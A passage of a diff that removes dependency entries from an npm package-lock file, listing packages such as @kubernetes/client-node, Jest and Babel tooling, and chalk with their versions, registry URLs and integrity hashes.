}, - "@kubernetes/client-node": { - "version": "0.22.3", - "resolved": "https://registry.npmjs.org/@kubernetes/client-node/-/client-node-0.22.3.tgz", - "integrity": "sha512-dG8uah3+HDJLpJEESshLRZlAZ4PgDeV9mZXT0u1g7oy4KMRzdZ7n5g0JEIlL6QhK51/2ztcIqURAnjfjJt6Z+g==", - "requires": { - "byline": "^5.0.0", - "isomorphic-ws": "^5.0.0", - "js-yaml": "^4.1.0", - "jsonpath-plus": "^10.2.0", - "openid-client": "^6.1.3", - "request": "^2.88.0", - "rfc4648": "^1.3.0", - "stream-buffers": "^3.0.2", - "tar": "^7.0.0", - "tslib": "^2.4.1", - "ws": "^8.18.0" - } - }, - "@pkgjs/parseargs": { - "version": "0.11.0", - "resolved": "https://registry.npmjs.org/@pkgjs/parseargs/-/parseargs-0.11.0.tgz", - "integrity": "sha512-+1VkjdD0QBLPodGrJUeqarH8VAIvQODIbwh9XpP5Syisf7YoQgsJKPNFoqqLQlu+VQ/tVSshMR6loPMn8U+dPg==", - "optional": true - }, - "@sinclair/typebox": { - "version": "0.27.8", - "resolved": "https://registry.npmjs.org/@sinclair/typebox/-/typebox-0.27.8.tgz", - "integrity": "sha512-+Fj43pSMwJs4KRrH/938Uf+uAELIgVBmQzg/q1YG10djyfA3TnrU8N8XzqCh/okZdszqBQTZf96idMfE5lnwTA==", - "dev": true - }, - "@sinonjs/commons": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@sinonjs/commons/-/commons-3.0.1.tgz", - "integrity": "sha512-K3mCHKQ9sVh8o1C9cxkwxaOmXoAMlDxC1mYyHrjqOWEcBjYr76t96zL2zlj5dUGZ3HSw240X1qgH3Mjf1yJWpQ==", - "dev": true, - "requires": { - "type-detect": "4.0.8" - } - }, - "@sinonjs/fake-timers": { - "version": "10.3.0", - "resolved": "https://registry.npmjs.org/@sinonjs/fake-timers/-/fake-timers-10.3.0.tgz", - "integrity": "sha512-V4BG07kuYSUkTCSBHG8G8TNhM+F19jXFWnQtzj+we8DrkpSBCee9Z3Ms8yiGer/dlmhe35/Xdgyo3/0rQKg7YA==", - "dev": true, - "requires": { - "@sinonjs/commons": "^3.0.0" - } - }, - "@types/babel__core": { - "version": "7.20.5", - "resolved": "https://registry.npmjs.org/@types/babel__core/-/babel__core-7.20.5.tgz", - "integrity": "sha512-qoQprZvz5wQFJwMDqeseRXWv3rqMvhgpbXFfVyWhbx9X47POIA6i/+dXefEmZKoAgOaTdaIgNSMqMIU61yRyzA==", - "dev": true, - "requires": { - "@babel/parser": "^7.20.7", - "@babel/types": "^7.20.7", - "@types/babel__generator": "*", - "@types/babel__template": "*", - "@types/babel__traverse": "*" - } - }, - "@types/babel__generator": { - "version": "7.6.8", - "resolved": "https://registry.npmjs.org/@types/babel__generator/-/babel__generator-7.6.8.tgz", - "integrity": "sha512-ASsj+tpEDsEiFr1arWrlN6V3mdfjRMZt6LtK/Vp/kreFLnr5QH5+DhvD5nINYZXzwJvXeGq+05iUXcAzVrqWtw==", - "dev": true, - "requires": { - "@babel/types": "^7.0.0" - } - }, - "@types/babel__template": { - "version": "7.4.4", - "resolved": "https://registry.npmjs.org/@types/babel__template/-/babel__template-7.4.4.tgz", - "integrity": "sha512-h/NUaSyG5EyxBIp8YRxo4RMe2/qQgvyowRwVMzhYhBCONbW8PUsg4lkFMrhgZhUe5z3L3MiLDuvyJ/CaPa2A8A==", - "dev": true, - "requires": { - "@babel/parser": "^7.1.0", - "@babel/types": "^7.0.0" - } - }, - "@types/babel__traverse": { - "version": "7.20.6", - "resolved": "https://registry.npmjs.org/@types/babel__traverse/-/babel__traverse-7.20.6.tgz", - "integrity": "sha512-r1bzfrm0tomOI8g1SzvCaQHo6Lcv6zu0EA+W2kHrt8dyrHQxGzBBL4kdkzIS+jBMV+EYcMAEAqXqYaLJq5rOZg==", - "dev": true, - "requires": { - "@babel/types": "^7.20.7" - } - }, - "@types/graceful-fs": { - "version": "4.1.9", - "resolved": "https://registry.npmjs.org/@types/graceful-fs/-/graceful-fs-4.1.9.tgz", - "integrity": "sha512-olP3sd1qOEe5dXTSaFvQG+02VdRXcdytWLAZsAq1PecU8uqQAhkrnbli7DagjtXKW/Bl7YJbUsa8MPcuc8LHEQ==", - "dev": true, - "requires": { - "@types/node": "*" - } - }, - "@types/istanbul-lib-coverage": { - "version": "2.0.4", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-coverage/-/istanbul-lib-coverage-2.0.4.tgz", - "integrity": "sha512-z/QT1XN4K4KYuslS23k62yDIDLwLFkzxOuMplDtObz0+y7VqJCaO2o+SPwHCvLFZh7xazvvoor2tA/hPz9ee7g==", - "dev": true - }, - "@types/istanbul-lib-report": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/@types/istanbul-lib-report/-/istanbul-lib-report-3.0.0.tgz", - "integrity": "sha512-plGgXAPfVKFoYfa9NpYDAkseG+g6Jr294RqeqcqDixSbU34MZVJRi/P+7Y8GDpzkEwLaGZZOpKIEmeVZNtKsrg==", - "dev": true, - "requires": { - "@types/istanbul-lib-coverage": "*" - } - }, - "@types/istanbul-reports": { - "version": "3.0.1", - "resolved": "https://registry.npmjs.org/@types/istanbul-reports/-/istanbul-reports-3.0.1.tgz", - "integrity": "sha512-c3mAZEuK0lvBp8tmuL74XRKn1+y2dcwOUpH7x4WrF6gk1GIgiluDRgMYQtw2OFcBvAJWlt6ASU3tSqxp0Uu0Aw==", - "dev": true, - "requires": { - "@types/istanbul-lib-report": "*" - } - }, - "@types/jest": { - "version": "29.5.14", - "resolved": "https://registry.npmjs.org/@types/jest/-/jest-29.5.14.tgz", - "integrity": "sha512-ZN+4sdnLUbo8EVvVc2ao0GFW6oVrQRPn4K2lglySj7APvSrgzxHiNNK99us4WDMi57xxA2yggblIAMNhXOotLQ==", - "dev": true, - "requires": { - "expect": "^29.0.0", - "pretty-format": "^29.0.0" - } - }, - "@types/node": { - "version": "22.10.1", - "resolved": "https://registry.npmjs.org/@types/node/-/node-22.10.1.tgz", - "integrity": "sha512-qKgsUwfHZV2WCWLAnVP1JqnpE6Im6h3Y0+fYgMTasNQ7V++CBX5OT1as0g0f+OyubbFqhf6XVNIsmN4IIhEgGQ==", - "dev": true, - "requires": { - "undici-types": "~6.20.0" - } - }, - "@types/stack-utils": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/@types/stack-utils/-/stack-utils-2.0.1.tgz", - "integrity": "sha512-Hl219/BT5fLAaz6NDkSuhzasy49dwQS/DSdu4MdggFB8zcXv7vflBI3xp7FEmkmdDkBUI2bPUNeMttp2knYdxw==", - "dev": true - }, - "@types/yargs": { - "version": "17.0.22", - "resolved": "https://registry.npmjs.org/@types/yargs/-/yargs-17.0.22.tgz", - "integrity": "sha512-pet5WJ9U8yPVRhkwuEIp5ktAeAqRZOq4UdAyWLWzxbtpyXnzbtLdKiXAjJzi/KLmPGS9wk86lUFWZFN6sISo4g==", - "dev": true, - "requires": { - "@types/yargs-parser": "*" - } - }, - "@types/yargs-parser": { - "version": "21.0.0", - "resolved": "https://registry.npmjs.org/@types/yargs-parser/-/yargs-parser-21.0.0.tgz", - "integrity": "sha512-iO9ZQHkZxHn4mSakYV0vFHAVDyEOIJQrV2uZ06HxEPcx+mt8swXoZHIbaaJ2crJYFfErySgktuTZ3BeLz+XmFA==", - "dev": true - }, - "ajv": { - "version": "6.12.6", - "resolved": "https://registry.npmjs.org/ajv/-/ajv-6.12.6.tgz", - "integrity": "sha512-j3fVLgvTo527anyYyJOGTYJbG+vnnQYvE0m5mmkc1TK+nxAppkCLMIL0aZ4dblVCNoGShhm+kzE4ZUykBoMg4g==", - "requires": { - "fast-deep-equal": "^3.1.1", - "fast-json-stable-stringify": "^2.0.0", - "json-schema-traverse": "^0.4.1", - "uri-js": "^4.2.2" - } - }, - "ansi-escapes": { - "version": "4.3.2", - "resolved": "https://registry.npmjs.org/ansi-escapes/-/ansi-escapes-4.3.2.tgz", - "integrity": "sha512-gKXj5ALrKWQLsYG9jlTRmR/xKluxHV+Z9QEwNIgCfM1/uwPMCuzVVnh5mwTd+OuBZcwSIMbqssNWRm1lE51QaQ==", - "dev": true, - "requires": { - "type-fest": "^0.21.3" - } - }, - "ansi-regex": { - "version": "5.0.1", - "resolved": "https://registry.npmjs.org/ansi-regex/-/ansi-regex-5.0.1.tgz", - "integrity": "sha512-quJQXlTSUGL2LH9SUXo8VwsY4soanhgo6LNSm84E1LBcE8s3O0wpdiRzyR9z/ZZJMlMWv37qOOb9pdJlMUEKFQ==" - }, - "ansi-styles": { - "version": "4.3.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-4.3.0.tgz", - "integrity": "sha512-zbB9rCJAT1rbjiVDb2hqKFHNYLxgtk8NURxZ3IZwD3F6NtxbXZQCnnSi1Lkx+IDohdPlFp222wVALIheZJQSEg==", - "requires": { - "color-convert": "^2.0.1" - } - }, - "anymatch": { - "version": "3.1.3", - "resolved": "https://registry.npmjs.org/anymatch/-/anymatch-3.1.3.tgz", - "integrity": "sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "requires": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - } - }, - "argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "requires": { - "safer-buffer": "~2.1.0" - } - }, - "assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha1-8S4PPF13sLHN2RRpQuTpbB5N1SU=" - }, - "async": { - "version": "3.2.6", - "resolved": "https://registry.npmjs.org/async/-/async-3.2.6.tgz", - "integrity": "sha512-htCUDlxyyCLMgaM3xXg0C0LW2xqfuQ6p05pCEIsXuyQ+a1koYKTuBMzRNwmybfLgvJDMd0r1LTn4+E0Ti6C2AA==", - "dev": true - }, - "asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha1-x57Zf380y48robyXkLzDZkdLS3k=" - }, - "aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha1-tG6JCTSpWR8tL2+G1+ap8bP+dqg=" - }, - "aws4": { - "version": "1.11.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.11.0.tgz", - "integrity": "sha512-xh1Rl34h6Fi1DC2WWKfxUTVqRsNnr6LsKz2+hfwDxQJWmrx8+c7ylaqBMcHfl1U1r2dsifOvKX3LQuLNZ+XSvA==" - }, - "babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "requires": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - } - }, - "babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "requires": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "dependencies": { - "istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "requires": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - } - } - } - }, - "babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "requires": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - } - }, - "babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "requires": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - } - }, - "babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "requires": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - } - }, - "balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha1-pDAdOJtqQ/m2f/PKEaP2Y342Dp4=", - "requires": { - "tweetnacl": "^0.14.3" - } - }, - "brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "requires": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "requires": { - "fill-range": "^7.1.1" - } - }, - "browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "requires": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - } - }, - "bs-logger": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/bs-logger/-/bs-logger-0.2.6.tgz", - "integrity": "sha512-pd8DCoxmbgc7hyPKOvxtqNcjYoOsABPQdcCUjGp3d42VR2CX1ORhk2A87oqqu5R1kk+76nsxZupkmyd+MVtCog==", - "dev": true, - "requires": { - "fast-json-stable-stringify": "2.x" - } - }, - "bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "requires": { - "node-int64": "^0.4.0" - } - }, - "buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha1-dBxSFkaOrcRXsDQQEYrXfejB3bE=" - }, - "callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true - }, - "camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true - }, - "caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true - }, - "caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha1-G2gcIf+EAzyCZUMJBolCDRhxUdw=" - }, - "chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "requires": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - } - }, - "char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true - }, - "chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==" - }, - "ci-info": { - "version": "3.3.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.3.0.tgz", - "integrity": "sha512-riT/3vI5YpVH6/qomlDnJow6TBee2PBKSEpx3O32EGPYbWGIRsIlGRms3Sm74wYE1JMo8RnO04Hb12+v1J5ICw==", - "dev": true - }, - "cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "requires": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - } - }, - "co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true - }, - "collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "requires": { - "color-name": "~1.1.4" - } - }, - "color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "requires": { - "delayed-stream": "~1.0.0" - } - }, - "concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha1-tf1UIgqivFq1eqtxQMlAdUUDwac=" - }, - "create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "requires": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - } - }, - "cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "requires": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - } - }, - "dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha1-hTz6D3y+L+1d4gMmuN1YEDX24vA=", - "requires": { - "assert-plus": "^1.0.0" - } - }, - "debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "requires": { - "ms": "2.1.2" - } - }, - "dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "requires": {} - }, - "deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true - }, - "delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha1-3zrhmayt+31ECqrgsp4icrJOxhk=" - }, - "detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true - }, - "diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true - }, - "eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha1-OoOpBOVDUyh4dMVkt1SThoSamMk=", - "requires": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "ejs": { - "version": "3.1.10", - "resolved": "https://registry.npmjs.org/ejs/-/ejs-3.1.10.tgz", - "integrity": "sha512-UeJmFfOrAQS8OJWPZ4qtgHyWExa088/MtK5UEyoJGFH67cDEXkZSviOiKRCZ4Xij0zxI3JECgYs3oKx+AizQBA==", - "dev": true, - "requires": { - "jake": "^10.8.5" - } - }, - "electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true - }, - "emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - 